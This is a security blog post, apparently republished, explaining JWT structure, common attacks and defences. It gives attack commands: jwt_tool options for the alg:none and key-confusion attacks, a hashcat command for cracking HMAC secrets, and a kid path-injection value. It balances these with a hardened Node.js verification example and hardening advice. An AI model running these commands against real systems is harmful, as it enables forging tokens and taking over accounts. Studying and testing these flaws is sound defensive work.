Hacking JSON Web Tokens (JWT): A Must Read


JSON Web Tokens (JWT) are widely used for authentication and data exchange in web applications. Understanding how they fail is essential for anyone defending or testing them. Below is a breakdown of JWT security, along with practical commands and techniques.

What is JWT?

JWT (JSON Web Token) is a compact, URL-safe means of representing claims between two parties. It consists of three parts:
– Header (algorithm & token type)
– Payload (claims/data)
– Signature (verification)

Example JWT:

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c 
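The three-part structure above, decoded in code as an added example (this is not code from the original post): a small Node.js decoder built on the built-in Buffer class, which understands the base64url alphabet that JWT segments use and that a plain `base64 -d` frequently rejects. The sample token is the one shown above; the function only decodes, it does not verify anything.

```javascript
// Added example (not part of the original post): decode a JWT's header and
// payload without verifying it. Decoding proves nothing about authenticity;
// the signature must still be checked before any claim is trusted.

// JWT segments are base64url (RFC 4648 section 5) without '=' padding, so a
// plain `base64 -d` often fails on them; Node's 'base64url' encoding handles
// both the URL-safe alphabet and the missing padding.
function decodeSegment(segment) {
  return JSON.parse(Buffer.from(segment, 'base64url').toString('utf8'));
}

// Split a compact JWT into its three parts. Returns the parsed header and
// payload, the raw signature segment, and the exact string the signature
// was computed over (header.payload, both still base64url-encoded).
function decodeJwt(token) {
  const parts = token.split('.');
  if (parts.length !== 3) {
    throw new Error(`expected 3 segments, got ${parts.length}`);
  }
  const [h, p, s] = parts;
  return {
    header: decodeSegment(h),
    payload: decodeSegment(p),
    signature: s,              // base64url, left undecoded here
    signingInput: `${h}.${p}`, // what the HMAC or RSA signature covers
  };
}

// The token from the post above.
const SAMPLE_JWT =
  'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.' +
  'eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.' +
  'SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c';

console.log(JSON.stringify(decodeJwt(SAMPLE_JWT), null, 2));
```

Run it with `node decode.js` to see the `alg`, `typ`, `sub`, `name` and `iat` fields of the sample token. Note that the header is readable by anyone holding the token, which is exactly why the server must never let the token choose how it is verified.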

Common JWT Attacks & Exploits

1. None Algorithm Attack

  • Some libraries accept tokens whose header says `alg: none`, which means the signature is never checked at all; a verifier must reject `none` outright and only accept the algorithm it actually issues.
  • Exploit Command:
    jwt_tool <JWT> -X a

2. Weak Secret (Brute Force)

  • Crack HMAC-signed JWT secrets using tools like hashcat (mode 16500 is the JWT mode). A recovered secret means anyone can mint valid tokens, which is why the secret must be long and random, not a password.
  • Command:
    hashcat -m 16500 -a 0 jwt.txt rockyou.txt

3. Key Confusion Attack

  • Trick the server into verifying with a public key when it expects an HMAC secret: if the server lets the token's `alg` header choose the verification routine, an RS256 public key (which is not secret) can end up being used as the HS256 key. Pinning the algorithm server-side prevents this.
  • Exploit:
    jwt_tool <JWT> -X k -pk public_key.pem

4. Header Injection (CVE-2015-9235)

  • Inject `"kid": "../../dev/null"` to bypass validation: if the server reads the signing key from the file named by `kid`, this path yields an empty key. Treat `kid` as an opaque identifier looked up in an allow-list, never as a file path.

You Should Know:

1. Decoding & Modifying JWTs

Use `jq` and `base64` to decode:

echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9" | base64 -d | jq 

2. Testing JWT Vulnerabilities

  • Using jwt_tool (`-T` opens its tamper mode for editing the header and payload claims):
    python3 jwt_tool.py <JWT> -T

3. Secure JWT Validation in Node.js

const jwt = require('jsonwebtoken');

const token = process.argv[2];            // token under test, passed on the command line
const secretKey = process.env.JWT_SECRET; // long random secret, never hard-coded

// Pinning `algorithms` makes the library reject a token whose header says
// "none" or names a public-key algorithm, regardless of what the header claims.
jwt.verify(token, secretKey, { algorithms: ['HS256'] }, (err, decoded) => {
  if (err) throw err; // bad signature, wrong algorithm, expired, etc.
  console.log(decoded);
});

4. Linux Command to Check JWT Expiry

echo "$JWT" | cut -d '.' -f 2 | tr '_-' '/+' | awk '{ while (length($0) % 4) $0 = $0 "="; print }' | base64 -d | jq '.exp'

(The payload segment is base64url without padding, so it is converted to standard base64 and padded before `base64 -d`; otherwise the decoder reports invalid input on many tokens.)

What Undercode Says

JWT security is critical in modern web apps. Always:
– Use strong secrets (e.g. `openssl rand -hex 32`).
– Restrict the accepted algorithms on the server side (HS256 or RS256, whichever you issue).
– Set short expiration times.
– Validate the `iss`, `aud`, and `sub` claims.

Expected Output:

A secure JWT implementation prevents unauthorized access. Test tokens thoroughly before deployment.

Reported By: Activity 7313512221039296512 – Hackers Feeds